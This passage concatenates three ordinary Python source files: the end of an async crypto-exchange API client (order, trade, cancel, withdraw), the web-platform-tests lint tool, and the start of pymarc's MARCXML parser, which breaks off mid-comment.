self._get_contract_address() buy_currency = await self.get_currency(token_buy) sell_currency = await self.get_currency(token_sell) hash_data = [ ['contractAddress', contract_address, 'address'], ['tokenBuy', buy_currency['address'], 'address'], ['amountBuy', amount_buy, 'uint256'], ['tokenSell', sell_currency['address'], 'address'], ['amountSell', amount_sell, 'uint256'], ['expires', '10000', 'uint256'], ['nonce', self._get_nonce(), 'uint256'], ['address', self._wallet_address, 'address'], ] return await self._post('order', True, hash_data=hash_data) create_order_wei.__doc__ = Client.create_order_wei.__doc__ @require_address @require_private_key async def create_trade(self, order_hash, token, amount): amount_trade = await self.convert_to_currency_quantity(token, amount) hash_data = [ ['orderHash', order_hash, 'address'], ['amount', amount_trade, 'uint256'], ['address', self._wallet_address, 'address'], ['nonce', self._get_nonce(), 'uint256'], ] return await self._post('trade', True, hash_data=hash_data) create_trade.__doc__ = Client.create_trade.__doc__ @require_address @require_private_key async def cancel_order(self, order_hash): hash_data = [ ['orderHash', order_hash, 'address'], ['nonce', self._get_nonce(), 'uint256'], ] json_data = { 'address': self._wallet_address } return await self._post('cancel', True, hash_data=hash_data, json=json_data) cancel_order.__doc__ = Client.cancel_order.__doc__ # Withdraw Endpoints @require_address @require_private_key async def withdraw(self, amount, token): contract_address = await self._get_contract_address() currency = await self.get_currency(token) # convert amount amount = await self.convert_to_currency_quantity(token, amount) hash_data = [ ['contractAddress', contract_address, 'address'], ['token', currency['address'], 'address'], ['amount', amount, 'uint256'], ['address', self._wallet_address, 'address'], ['nonce', self._get_nonce(), 'uint256'], ] return await self._post('withdraw', True, hash_data=hash_data) withdraw.__doc__ = Client.withdraw.__doc__ Kaiido/wpt from __future__ import print_function, unicode_literals import abc import argparse import ast import io import json import logging import os import re import subprocess import sys import tempfile from collections import defaultdict from . import fnmatch from . import rules from .. import localpaths from ..gitignore.gitignore import PathFilter from ..wpt import testfiles from ..manifest.vcs import walk from ..manifest.sourcefile import SourceFile, js_meta_re, python_meta_re, space_chars, get_any_variants from six import binary_type, ensure_binary, ensure_text, iteritems, itervalues, with_metaclass from six.moves import range from six.moves.urllib.parse import urlsplit, urljoin MYPY = False if MYPY: # MYPY is set to True when run under Mypy. from typing import Any from typing import Dict from typing import IO from typing import Iterable from typing import List from typing import Optional from typing import Sequence from typing import Set from typing import Text from typing import Tuple from typing import Type # The Ignorelist is a two level dictionary. The top level is indexed by # error names (e.g. 'TRAILING WHITESPACE'). Each of those then has a map of # file patterns (e.g. 'foo/*') to a set of specific line numbers for the # exception. The line numbers are optional; if missing the entire file # ignores the error. 
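# (Editor's illustrative example, hedged; the file patterns below are made up.) A populated
# Ignorelist therefore looks like:
#     {
#         "TRAILING WHITESPACE": {"foo/*": {None}},          # whole matching files ignored
#         "CONSOLE": {"tools/example.html": {12, 34}},       # ignored only on those lines
#     }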
Ignorelist = Dict[Text, Dict[Text, Set[Optional[int]]]] try: from xml.etree import cElementTree as ElementTree except ImportError: from xml.etree import ElementTree as ElementTree # type: ignore logger = None # type: Optional[logging.Logger] def setup_logging(prefix=False): # type: (bool) -> None global logger if logger is None: logger = logging.getLogger(os.path.basename(os.path.splitext(__file__)[0])) handler = logging.StreamHandler(sys.stdout) # type: logging.Handler # Only add a handler if the parent logger is missing a handler parent = logger.parent assert isinstance(parent, logging.Logger) if parent and len(parent.handlers) == 0: handler = logging.StreamHandler(sys.stdout) logger.addHandler(handler) if prefix: format = logging.BASIC_FORMAT else: format = str("%(message)s") formatter = logging.Formatter(format) for handler in logger.handlers: handler.setFormatter(formatter) logger.setLevel(logging.DEBUG) setup_logging() ERROR_MSG = """You must fix all errors; for details on how to fix them, see https://web-platform-tests.org/writing-tests/lint-tool.html However, instead of fixing a particular error, it's sometimes OK to add a line to the lint.ignore file in the root of the web-platform-tests directory to make the lint tool ignore it. For example, to make the lint tool ignore all '%s' errors in the %s file, you could add the following line to the lint.ignore file. %s: %s""" def all_filesystem_paths(repo_root, subdir=None): # type: (Text, Optional[Text]) -> Iterable[Text] path_filter = PathFilter(repo_root.encode("utf8"), extras=[ensure_binary(".git/")]) if subdir: expanded_path = subdir.encode("utf8") subdir_str = expanded_path else: expanded_path = repo_root.encode("utf8") for dirpath, dirnames, filenames in path_filter(walk(expanded_path)): for filename, _ in filenames: path = os.path.join(dirpath, filename) if subdir: path = os.path.join(subdir_str, path) assert not os.path.isabs(path), path yield ensure_text(path) def _all_files_equal(paths): # type: (Iterable[Text]) -> bool """ Checks all the paths are files that are byte-for-byte identical :param paths: the list of paths to compare :returns: True if they are all identical """ paths = list(paths) if len(paths) < 2: return True first = paths.pop() size = os.path.getsize(first) if any(os.path.getsize(path) != size for path in paths): return False # Chunk this to avoid eating up memory and file descriptors bufsize = 4096*4 # 16KB, a "reasonable" number of disk sectors groupsize = 8 # Hypothesised to be large enough in the common case that everything fits in one group with open(first, "rb") as first_f: for start in range(0, len(paths), groupsize): path_group = paths[start:start+groupsize] first_f.seek(0) try: files = [open(x, "rb") for x in path_group] for _ in range(0, size, bufsize): a = first_f.read(bufsize) for f in files: b = f.read(bufsize) if a != b: return False finally: for f in files: f.close() return True def check_path_length(repo_root, path): # type: (Text, Text) -> List[rules.Error] if len(path) + 1 > 150: return [rules.PathLength.error(path, (path, len(path) + 1))] return [] def check_file_type(repo_root, path): # type: (Text, Text) -> List[rules.Error] if os.path.islink(path): return [rules.FileType.error(path, (path, "symlink"))] return [] def check_worker_collision(repo_root, path): # type: (Text, Text) -> List[rules.Error] endings = [(".any.html", ".any.js"), (".any.worker.html", ".any.js"), (".worker.html", ".worker.js")] for path_ending, generated in endings: if path.endswith(path_ending): return 
[rules.WorkerCollision.error(path, (path_ending, generated))] return [] def check_gitignore_file(repo_root, path): # type: (Text, Text) -> List[rules.Error] if not path.endswith(".gitignore"): return [] path_parts = path.split(os.path.sep) if len(path_parts) == 1: return [] if path_parts[-1] != ".gitignore": return [] if (path_parts[0] in ["tools", "docs"] or path_parts[:2] == ["resources", "webidl2"] or path_parts[:3] == ["css", "tools", "apiclient"]): return [] return [rules.GitIgnoreFile.error(path)] def check_ahem_copy(repo_root, path): # type: (Text, Text) -> List[rules.Error] lpath = path.lower() if "ahem" in lpath and lpath.endswith(".ttf"): return [rules.AhemCopy.error(path)] return [] def check_tentative_directories(repo_root, path): # type: (Text, Text) -> List[rules.Error] path_parts = path.split(os.path.sep) for directory in path_parts[:-1]: if "tentative" in directory and directory != "tentative": return [rules.TentativeDirectoryName.error(path)] return [] def check_git_ignore(repo_root, paths): # type: (Text, List[Text]) -> List[rules.Error] errors = [] with tempfile.TemporaryFile('w+') as f: f.write('\n'.join(paths)) f.seek(0) try: matches = subprocess.check_output( ["git", "check-ignore", "--verbose", "--no-index", "--stdin"], stdin=f) for match in matches.strip().split(b'\n'): match_filter, path_bytes = match.split() _, _, filter_string = match_filter.split(b':') # If the matching filter reported by check-ignore is a special-case exception, # that's fine. Otherwise, it requires a new special-case exception. if filter_string[0:1] != b'!': path = path_bytes.decode("utf8") errors.append(rules.IgnoredPath.error(path, (path,))) except subprocess.CalledProcessError: # Nonzero return code means that no match exists. pass return errors drafts_csswg_re = re.compile(r"https?\:\/\/drafts\.csswg\.org\/([^/?#]+)") w3c_tr_re = re.compile(r"https?\:\/\/www\.w3c?\.org\/TR\/([^/?#]+)") w3c_dev_re = re.compile(r"https?\:\/\/dev\.w3c?\.org\/[^/?#]+\/([^/?#]+)") def check_css_globally_unique(repo_root, paths): # type: (Text, List[Text]) -> List[rules.Error] """ Checks that CSS filenames are sufficiently unique This groups files by path classifying them as "test", "reference", or "support". "test" files must have a unique name across files that share links to the same spec. "reference" and "support" files, on the other hand, must have globally unique names. :param repo_root: the repository root :param paths: list of all paths :returns: a list of errors found in ``paths`` """ test_files = defaultdict(set) # type: Dict[Text, Set[Text]] ref_files = defaultdict(set) # type: Dict[Text, Set[Text]] support_files = defaultdict(set) # type: Dict[Text, Set[Text]] for path in paths: if os.name == "nt": path = path.replace(u"\\", u"/") if not path.startswith(u"css/"): continue source_file = SourceFile(repo_root, path, u"/") if source_file.name_is_non_test: # If we're name_is_non_test for a reason apart from support, ignore it. # We care about support because of the requirement all support files in css/ to be in # a support directory; see the start of check_parsed. 
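# (Editor's gloss, hedged; the path is an illustrative example.) For a path such as
# u"css/css-foo/support/image.png", the slice below yields the support name
# u"support/image.png", which must be unique across all of css/ unless the colliding
# files are byte-for-byte identical (see _all_files_equal).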
offset = path.find(u"/support/") if offset == -1: continue parts = source_file.dir_path.split(os.path.sep) if (parts[0] in source_file.root_dir_non_test or any(item in source_file.dir_non_test - {u"support"} for item in parts) or any(parts[:len(non_test_path)] == list(non_test_path) for non_test_path in source_file.dir_path_non_test)): continue support_name = path[offset+1:] support_files[support_name].add(path) elif source_file.name_is_reference: ref_files[source_file.name].add(path) else: test_name = source_file.name # type: Text test_name = test_name.replace(u'-manual', u'') test_files[test_name].add(path) errors = [] for name, colliding in iteritems(test_files): if len(colliding) > 1: if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]): # Only compute by_spec if there are prima-facie collisions because of cost by_spec = defaultdict(set) # type: Dict[Text, Set[Text]] for path in colliding: source_file = SourceFile(repo_root, path, u"/") for link in source_file.spec_links: for r in (drafts_csswg_re, w3c_tr_re, w3c_dev_re): m = r.match(link) if m: spec = m.group(1) break else: continue by_spec[spec].add(path) for spec, spec_paths in iteritems(by_spec): if not _all_files_equal([os.path.join(repo_root, x) for x in spec_paths]): for x in spec_paths: context1 = (name, spec, ", ".join(sorted(spec_paths))) errors.append(rules.CSSCollidingTestName.error(x, context1)) for rule_class, d in [(rules.CSSCollidingRefName, ref_files), (rules.CSSCollidingSupportName, support_files)]: for name, colliding in iteritems(d): if len(colliding) > 1: if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]): context2 = (name, ", ".join(sorted(colliding))) for x in colliding: errors.append(rule_class.error(x, context2)) return errors def check_unique_testharness_basenames(repo_root, paths): # type: (Text, List[Text]) -> List[rules.Error] """ Checks that all testharness files have unique basename paths. The 'basename path' refers to the entire path excluding the extension. For example, 'foo/bar/baz.html' and 'foo/bar/baz.xhtml' have the same basename path, but 'foo/bar/baz.html' and 'foo/qux/baz.html' do not. Testharness files with identical basenames have caused issues in downstream infrastructure (see https://github.com/web-platform-tests/wpt/issues/7570), and may cause confusion in general. :param repo_root: the repository root :param paths: list of all paths :returns: a list of errors found in ``paths`` """ errors = [] file_dict = defaultdict(list) for path in paths: source_file = SourceFile(repo_root, path, "/") if source_file.type != "testharness": continue file_name, file_extension = os.path.splitext(path) file_dict[file_name].append(file_extension) for k, v in file_dict.items(): if len(v) == 1: continue context = (', '.join(v),) for extension in v: errors.append(rules.DuplicateBasenamePath.error(k + extension, context)) return errors def parse_ignorelist(f): # type: (IO[Text]) -> Tuple[Ignorelist, Set[Text]] """ Parse the ignorelist file given by `f`, and return the parsed structure. :returns: a tuple of an Ignorelist and a set of files that are completely skipped by the linter (i.e. have a '*' entry). 
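Each entry has the form ``ERROR TYPE[, OTHER ERROR TYPE]: file/glob[: line number]``,
``#`` starts a comment, and a ``*`` error type skips the matching files
entirely. The entries below are illustrative, not taken from the real
lint.ignore file:

    # ignore one kind of error in one file
    TRAILING WHITESPACE: css/example/legacy-test.html
    # ignore an error only on a specific line
    SET TIMEOUT: tools/example/slow_helper.py: 12
    # skip these files completely
    *: resources/example-vendored/*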
""" data = defaultdict(lambda:defaultdict(set)) # type: Ignorelist skipped_files = set() # type: Set[Text] for line in f: line = line.strip() if not line or line.startswith("#"): continue parts = [item.strip() for item in line.split(":")] if len(parts) == 2: error_types_s, file_match = parts line_number = None # type: Optional[int] else: error_types_s, file_match, line_number_s = parts line_number = int(line_number_s) error_types = {item.strip() for item in error_types_s.split(",")} file_match = os.path.normcase(file_match) if "*" in error_types: skipped_files.add(file_match) else: for error_type in error_types: data[error_type][file_match].add(line_number) return data, skipped_files def filter_ignorelist_errors(data, errors): # type: (Ignorelist, Sequence[rules.Error]) -> List[rules.Error] """ Filter out those errors that are ignored in `data`. """ if not errors: return [] skipped = [False for item in range(len(errors))] for i, (error_type, msg, path, line) in enumerate(errors): normpath = os.path.normcase(path) # Allow skipping all lint errors except the IGNORED PATH lint, # which explains how to fix it correctly and shouldn't be skipped. if error_type in data and error_type != "IGNORED PATH": wl_files = data[error_type] for file_match, allowed_lines in iteritems(wl_files): if None in allowed_lines or line in allowed_lines: if fnmatch.fnmatchcase(normpath, file_match): skipped[i] = True return [item for i, item in enumerate(errors) if not skipped[i]] regexps = [item() for item in # type: ignore [rules.TrailingWhitespaceRegexp, rules.TabsRegexp, rules.CRRegexp, rules.SetTimeoutRegexp, rules.W3CTestOrgRegexp, rules.WebPlatformTestRegexp, rules.Webidl2Regexp, rules.ConsoleRegexp, rules.GenerateTestsRegexp, rules.PrintRegexp, rules.LayoutTestsRegexp, rules.MissingDepsRegexp, rules.SpecialPowersRegexp, rules.AssertThrowsRegexp, rules.PromiseRejectsRegexp, rules.AssertPreconditionRegexp]] def check_regexp_line(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] errors = [] # type: List[rules.Error] applicable_regexps = [regexp for regexp in regexps if regexp.applies(path)] for i, line in enumerate(f): for regexp in applicable_regexps: if regexp.search(line): errors.append((regexp.name, regexp.description, path, i+1)) return errors def check_parsed(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] source_file = SourceFile(repo_root, path, "/", contents=f.read()) errors = [] # type: List[rules.Error] if path.startswith("css/"): if (source_file.type == "support" and not source_file.name_is_non_test and not source_file.name_is_reference): return [rules.SupportWrongDir.error(path)] if (source_file.type != "support" and not source_file.name_is_reference and not source_file.name_is_tentative and not source_file.spec_links): return [rules.MissingLink.error(path)] if source_file.name_is_non_test: return [] if source_file.markup_type is None: return [] if source_file.root is None: return [rules.ParseFailed.error(path)] if source_file.type == "manual" and not source_file.name_is_manual: errors.append(rules.ContentManual.error(path)) if source_file.type == "visual" and not source_file.name_is_visual: errors.append(rules.ContentVisual.error(path)) about_blank_parts = urlsplit("about:blank") for reftest_node in source_file.reftest_nodes: href = reftest_node.attrib.get("href", "").strip(space_chars) parts = urlsplit(href) if parts == about_blank_parts: continue if (parts.scheme or parts.netloc): errors.append(rules.AbsoluteUrlRef.error(path, (href,))) continue 
ref_url = urljoin(source_file.url, href) ref_parts = urlsplit(ref_url) if source_file.url == ref_url: errors.append(rules.SameFileRef.error(path)) continue assert ref_parts.path != "" reference_file = os.path.join(repo_root, ref_parts.path[1:]) reference_rel = reftest_node.attrib.get("rel", "") if not os.path.isfile(reference_file): errors.append(rules.NonexistentRef.error(path, (reference_rel, href))) if len(source_file.timeout_nodes) > 1: errors.append(rules.MultipleTimeout.error(path)) for timeout_node in source_file.timeout_nodes: timeout_value = timeout_node.attrib.get("content", "").lower() if timeout_value != "long": errors.append(rules.InvalidTimeout.error(path, (timeout_value,))) required_elements = [] # type: List[Text] testharnessreport_nodes = [] # type: List[ElementTree.Element] if source_file.testharness_nodes: test_type = source_file.manifest_items()[0] if test_type not in ("testharness", "manual"): errors.append(rules.TestharnessInOtherType.error(path, (test_type,))) if len(source_file.testharness_nodes) > 1: errors.append(rules.MultipleTestharness.error(path)) testharnessreport_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testharnessreport.js']") if not testharnessreport_nodes: errors.append(rules.MissingTestharnessReport.error(path)) else: if len(testharnessreport_nodes) > 1: errors.append(rules.MultipleTestharnessReport.error(path)) for element in source_file.variant_nodes: if "content" not in element.attrib: errors.append(rules.VariantMissing.error(path)) else: variant = element.attrib["content"] if variant != "" and variant[0] not in ("?", "#"): errors.append(rules.MalformedVariant.error(path, (path,))) required_elements.extend(key for key, value in {"testharness": True, "testharnessreport": len(testharnessreport_nodes) > 0, "timeout": len(source_file.timeout_nodes) > 0}.items() if value) testdriver_vendor_nodes = [] # type: List[ElementTree.Element] if source_file.testdriver_nodes: if len(source_file.testdriver_nodes) > 1: errors.append(rules.MultipleTestdriver.error(path)) testdriver_vendor_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testdriver-vendor.js']") if not testdriver_vendor_nodes: errors.append(rules.MissingTestdriverVendor.error(path)) else: if len(testdriver_vendor_nodes) > 1: errors.append(rules.MultipleTestdriverVendor.error(path)) required_elements.append("testdriver") if len(testdriver_vendor_nodes) > 0: required_elements.append("testdriver-vendor") if required_elements: seen_elements = defaultdict(bool) for elem in source_file.root.iter(): if source_file.timeout_nodes and elem == source_file.timeout_nodes[0]: seen_elements["timeout"] = True if seen_elements["testharness"]: errors.append(rules.LateTimeout.error(path)) elif source_file.testharness_nodes and elem == source_file.testharness_nodes[0]: seen_elements["testharness"] = True elif testharnessreport_nodes and elem == testharnessreport_nodes[0]: seen_elements["testharnessreport"] = True if not seen_elements["testharness"]: errors.append(rules.EarlyTestharnessReport.error(path)) elif source_file.testdriver_nodes and elem == source_file.testdriver_nodes[0]: seen_elements["testdriver"] = True elif testdriver_vendor_nodes and elem == testdriver_vendor_nodes[0]: seen_elements["testdriver-vendor"] = True if not seen_elements["testdriver"]: errors.append(rules.EarlyTestdriverVendor.error(path)) if all(seen_elements[name] for name in required_elements): break for element in 
source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src]"): src = element.attrib["src"] def incorrect_path(script, src): # type: (Text, Text) -> bool return (script == src or ("/%s" % script in src and src != "/resources/%s" % script)) if incorrect_path("testharness.js", src): errors.append(rules.TestharnessPath.error(path)) if incorrect_path("testharnessreport.js", src): errors.append(rules.TestharnessReportPath.error(path)) if incorrect_path("testdriver.js", src): errors.append(rules.TestdriverPath.error(path)) if incorrect_path("testdriver-vendor.js", src): errors.append(rules.TestdriverVendorPath.error(path)) return errors class ASTCheck(with_metaclass(abc.ABCMeta)): @abc.abstractproperty def rule(self): # type: () -> Type[rules.Rule] pass @abc.abstractmethod def check(self, root): # type: (ast.AST) -> List[int] pass class OpenModeCheck(ASTCheck): rule = rules.OpenNoMode def check(self, root): # type: (ast.AST) -> List[int] errors = [] for node in ast.walk(root): if isinstance(node, ast.Call): if hasattr(node.func, "id") and node.func.id in ("open", "file"): # type: ignore if (len(node.args) < 2 and all(item.arg != "mode" for item in node.keywords)): errors.append(node.lineno) return errors ast_checkers = [item() for item in [OpenModeCheck]] def check_python_ast(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] # *.quic.py are Python 3 only and cannot be parsed by Python 2. if not path.endswith(".py") or path.endswith(".quic.py"): return [] try: root = ast.parse(f.read()) except SyntaxError as e: return [rules.ParseFailed.error(path, line_no=e.lineno)] errors = [] for checker in ast_checkers: for lineno in checker.check(root): errors.append(checker.rule.error(path, line_no=lineno)) return errors broken_js_metadata = re.compile(br"//\s*META:") broken_python_metadata = re.compile(br"#\s*META:") def check_global_metadata(value): # type: (bytes) -> Iterable[Tuple[Type[rules.Rule], Tuple[Any, ...]]] global_values = {item.strip().decode("utf8") for item in value.split(b",") if item.strip()} # TODO: this could check for duplicates and such for global_value in global_values: if not get_any_variants(global_value): yield (rules.UnknownGlobalMetadata, ()) def check_script_metadata(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] if path.endswith((".worker.js", ".any.js")): meta_re = js_meta_re broken_metadata = broken_js_metadata elif path.endswith(".py"): meta_re = python_meta_re broken_metadata = broken_python_metadata else: return [] done = False errors = [] for idx, line in enumerate(f): assert isinstance(line, binary_type), line m = meta_re.match(line) if m: key, value = m.groups() if key == b"global": for rule_class, context in check_global_metadata(value): errors.append(rule_class.error(path, context, idx + 1)) elif key == b"timeout": if value != b"long": errors.append(rules.UnknownTimeoutMetadata.error(path, line_no=idx + 1)) elif key not in (b"title", b"script", b"variant", b"quic"): errors.append(rules.UnknownMetadata.error(path, line_no=idx + 1)) else: done = True if done: if meta_re.match(line): errors.append(rules.StrayMetadata.error(path, line_no=idx + 1)) elif meta_re.search(line): errors.append(rules.IndentedMetadata.error(path, line_no=idx + 1)) elif broken_metadata.search(line): errors.append(rules.BrokenMetadata.error(path, line_no=idx + 1)) return errors ahem_font_re = re.compile(br"font.*:.*ahem", flags=re.IGNORECASE) # Ahem can appear either in the global location or in the support # directory for legacy Mozilla 
imports ahem_stylesheet_re = re.compile(br"\/fonts\/ahem\.css|support\/ahem.css", flags=re.IGNORECASE) def check_ahem_system_font(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] if not path.endswith((".html", ".htm", ".xht", ".xhtml")): return [] contents = f.read() errors = [] if ahem_font_re.search(contents) and not ahem_stylesheet_re.search(contents): errors.append(rules.AhemSystemFont.error(path)) return errors def check_path(repo_root, path): # type: (Text, Text) -> List[rules.Error] """ Runs lints that check the file path. :param repo_root: the repository root :param path: the path of the file within the repository :returns: a list of errors found in ``path`` """ errors = [] for path_fn in path_lints: errors.extend(path_fn(repo_root, path)) return errors def check_all_paths(repo_root, paths): # type: (Text, List[Text]) -> List[rules.Error] """ Runs lints that check all paths globally. :param repo_root: the repository root :param paths: a list of all the paths within the repository :returns: a list of errors found in ``f`` """ errors = [] for paths_fn in all_paths_lints: errors.extend(paths_fn(repo_root, paths)) return errors def check_file_contents(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] """ Runs lints that check the file contents. :param repo_root: the repository root :param path: the path of the file within the repository :param f: a file-like object with the file contents :returns: a list of errors found in ``f`` """ errors = [] for file_fn in file_lints: errors.extend(file_fn(repo_root, path, f)) f.seek(0) return errors def output_errors_text(errors): # type: (List[rules.Error]) -> None assert logger is not None for error_type, description, path, line_number in errors: pos_string = path if line_number: pos_string += ":%s" % line_number logger.error("%s: %s (%s)" % (pos_string, description, error_type)) def output_errors_markdown(errors): # type: (List[rules.Error]) -> None if not errors: return assert logger is not None heading = """Got lint errors: | Error Type | Position | Message | |------------|----------|---------|""" for line in heading.split("\n"): logger.error(line) for error_type, description, path, line_number in errors: pos_string = path if line_number: pos_string += ":%s" % line_number logger.error("%s | %s | %s |" % (error_type, pos_string, description)) def output_errors_json(errors): # type: (List[rules.Error]) -> None for error_type, error, path, line_number in errors: print(json.dumps({"path": path, "lineno": line_number, "rule": error_type, "message": error})) def output_error_count(error_count): # type: (Dict[Text, int]) -> None if not error_count: return assert logger is not None by_type = " ".join("%s: %d" % item for item in error_count.items()) count = sum(error_count.values()) logger.info("") if count == 1: logger.info("There was 1 error (%s)" % (by_type,)) else: logger.info("There were %d errors (%s)" % (count, by_type)) def changed_files(wpt_root): # type: (Text) -> List[Text] revish = testfiles.get_revish(revish=None) changed, _ = testfiles.files_changed(revish, None, include_uncommitted=True, include_new=True) return [os.path.relpath(item, wpt_root) for item in changed] def lint_paths(kwargs, wpt_root): # type: (Dict[Text, Any], Text) -> List[Text] if kwargs.get("paths"): paths = [] for path in kwargs.get("paths", []): if os.path.isdir(path): path_dir = list(all_filesystem_paths(wpt_root, path)) paths.extend(path_dir) elif os.path.isfile(path): 
paths.append(os.path.relpath(os.path.abspath(path), wpt_root)) elif kwargs["all"]: paths = list(all_filesystem_paths(wpt_root)) else: changed_paths = changed_files(wpt_root) force_all = False for path in changed_paths: path = path.replace(os.path.sep, "/") if path == "lint.ignore" or path.startswith("tools/lint/"): force_all = True break paths = (list(changed_paths) if not force_all else list(all_filesystem_paths(wpt_root))) return paths def create_parser(): # type: () -> argparse.ArgumentParser parser = argparse.ArgumentParser() parser.add_argument("paths", nargs="*", help="List of paths to lint") parser.add_argument("--json", action="store_true", help="Output machine-readable JSON format") parser.add_argument("--markdown", action="store_true", help="Output markdown") parser.add_argument("--repo-root", type=ensure_text, help="The WPT directory. Use this " "option if the lint script exists outside the repository") parser.add_argument("--ignore-glob", type=ensure_text, action="append", help="Additional file glob to ignore (repeat to add more). " "Globs are matched against paths relative to REPO_ROOT " "using fnmatch, except that path separators are normalized.") parser.add_argument("--all", action="store_true", help="If no paths are passed, try to lint the whole " "working directory, not just files that changed") return parser def main(**kwargs_str): # type: (**Any) -> int kwargs = {ensure_text(key): value for key, value in iteritems(kwargs_str)} assert logger is not None if kwargs.get("json") and kwargs.get("markdown"): logger.critical("Cannot specify --json and --markdown") sys.exit(2) repo_root = kwargs.get('repo_root') or localpaths.repo_root output_format = {(True, False): "json", (False, True): "markdown", (False, False): "normal"}[(kwargs.get("json", False), kwargs.get("markdown", False))] if output_format == "markdown": setup_logging(True) paths = lint_paths(kwargs, repo_root) ignore_glob = kwargs.get("ignore_glob", []) return lint(repo_root, paths, output_format, ignore_glob) def lint(repo_root, paths, output_format, ignore_glob=None): # type: (Text, List[Text], Text, Optional[List[Text]]) -> int error_count = defaultdict(int) # type: Dict[Text, int] last = None with io.open(os.path.join(repo_root, "lint.ignore"), "r") as f: ignorelist, skipped_files = parse_ignorelist(f) if ignore_glob: skipped_files |= set(ignore_glob) output_errors = {"json": output_errors_json, "markdown": output_errors_markdown, "normal": output_errors_text}[output_format] def process_errors(errors): # type: (List[rules.Error]) -> Optional[Tuple[Text, Text]] """ Filters and prints the errors, and updates the ``error_count`` object. 
:param errors: a list of error tuples (error type, message, path, line number) :returns: ``None`` if there were no errors, or a tuple of the error type and the path otherwise """ errors = filter_ignorelist_errors(ignorelist, errors) if not errors: return None output_errors(errors) for error_type, error, path, line in errors: error_count[error_type] += 1 return (errors[-1][0], path) for path in paths[:]: abs_path = os.path.join(repo_root, path) if not os.path.exists(abs_path): paths.remove(path) continue if any(fnmatch.fnmatch(path, file_match) for file_match in skipped_files): paths.remove(path) continue errors = check_path(repo_root, path) last = process_errors(errors) or last if not os.path.isdir(abs_path): with io.open(abs_path, 'rb') as test_file: errors = check_file_contents(repo_root, path, test_file) last = process_errors(errors) or last errors = check_all_paths(repo_root, paths) last = process_errors(errors) or last if output_format in ("normal", "markdown"): output_error_count(error_count) if error_count: assert last is not None assert logger is not None for line in (ERROR_MSG % (last[0], last[1], last[0], last[1])).split("\n"): logger.info(line) return sum(itervalues(error_count)) path_lints = [check_file_type, check_path_length, check_worker_collision, check_ahem_copy, check_tentative_directories, check_gitignore_file] all_paths_lints = [check_css_globally_unique, check_unique_testharness_basenames] file_lints = [check_regexp_line, check_parsed, check_python_ast, check_script_metadata, check_ahem_system_font] # Don't break users of the lint that don't have git installed. try: subprocess.check_output(["git", "--version"]) all_paths_lints += [check_git_ignore] except subprocess.CalledProcessError: print('No git present; skipping .gitignore lint.') if __name__ == "__main__": args = create_parser().parse_args() error_count = main(**vars(args)) if error_count > 0: sys.exit(1) pymarc/marcxml.py "pymarc marcxml file." import logging from xml.sax import make_parser from xml.sax.handler import ContentHandler, feature_namespaces import unicodedata import six try: import xml.etree.ElementTree as ET # builtin in Python 2.5 except ImportError: import elementtree.ElementTree as ET from pymarc import Record, Field, MARC8ToUnicode XSI_NS = "http://www.w3.org/2001/XMLSchema-instance" MARC_XML_NS = "http://www.loc.gov/MARC21/slim" MARC_XML_SCHEMA = "http://www.loc.gov/MARC21/slim http://www.loc.gov/standards/marcxml/schema/MARC21slim.xsd" class XmlHandler(ContentHandler): """ You can subclass XmlHandler and add your own process_record method that'll be passed a pymarc.Record as it becomes available. This could be useful if you want to stream the records elsewhere (like to a rdbms) without having to store them all in memory. 
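A minimal sketch of such a subclass (the class name and file name are
illustrative, not part of pymarc):

    class PrintingHandler(XmlHandler):
        def process_record(self, record):
            # handle each pymarc.Record as soon as it is parsed instead of
            # letting the base class accumulate it in self.records
            print(record)

    parse_xml('marc.xml', PrintingHandler())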
""" def __init__(self, strict=False, normalize_form=None): self.records = [] self._record = None self._field = None self._subfield_code = None self._text = [] self._strict = strict self.normalize_form = normalize_form def startElementNS(self, name, qname, attrs): if self._strict and name[0] != MARC_XML_NS: return element = name[1] self._text = [] if element == 'record': self._record = Record() elif element == 'controlfield': tag = attrs.getValue((None, u'tag')) self._field = Field(tag) elif element == 'datafield': tag = attrs.getValue((None, u'tag')) ind1 = attrs.get((None, u'ind1'), u' ') ind2 = attrs.get((None, u'ind2'), u' ') self._field = Field(tag, [ind1, ind2]) elif element == 'subfield': self._subfield_code = attrs[(None, 'code')] def endElementNS(self, name, qname): if self._strict and name[0] != MARC_XML_NS: return element = name[1] if self.normalize_form is not None: text = unicodedata.normalize(self.normalize_form, u''.join(self._text)) else: text = u''.join(self._text) if element == 'record': self.process_record(self._record) self._record = None elif element == 'leader': self._record.leader = text elif element == 'controlfield': self._field.data = text self._record.add_field(self._field) self._field = None elif element == 'datafield': self._record.add_field(self._field) self._field = None elif element == 'subfield': self._field.subfields.append(self._subfield_code) self._field.subfields.append(text) self._subfield_code = None self._text = [] def characters(self, chars): self._text.append(chars) def process_record(self, record): self.records.append(record) def parse_xml(xml_file, handler): """ parse a file with a given subclass of xml.sax.handler.ContentHandler """ parser = make_parser() parser.setContentHandler(handler) parser.setFeature(feature_namespaces, 1) parser.parse(xml_file) def map_xml(function, *files): """ map a function onto the file, so that for each record that is parsed the function will get called with the extracted record def do_it(r): print(r) map_xml(do_it, 'marc.xml') """ handler = XmlHandler() handler.process_record = function for xml_file in files: parse_xml(xml_file, handler) def parse_xml_to_array(xml_file, strict=False, normalize_form=None): """ parse an xml file and return the records as an array. Instead of passing in a file path you can also pass in an open file handle, or a file like object like StringIO. If you would like the parser to explicitly check the namespaces for the MARCSlim namespace use the strict=True option. Valid values for normalize_form are 'NFC', 'NFKC', 'NFD', and 'NFKD'. See unicodedata.normalize for more info on these. """ handler = XmlHandler(strict, normalize_form) parse_xml(xml_file, handler) return handler.records def record_to_xml(record, quiet=False, namespace=False): node = record_to_xml_node(record, quiet, namespace) return ET.tostring(node) def record_to_xml_node(record, quiet=False, namespace=False): """ converts a record object to a chunk of xml. If you would like to include the marcxml namespace in the root tag set namespace to True. """ # helper for converting non-unicode data to unicode # TODO: maybe should set g0 and g1 appropriately using 066 $a and 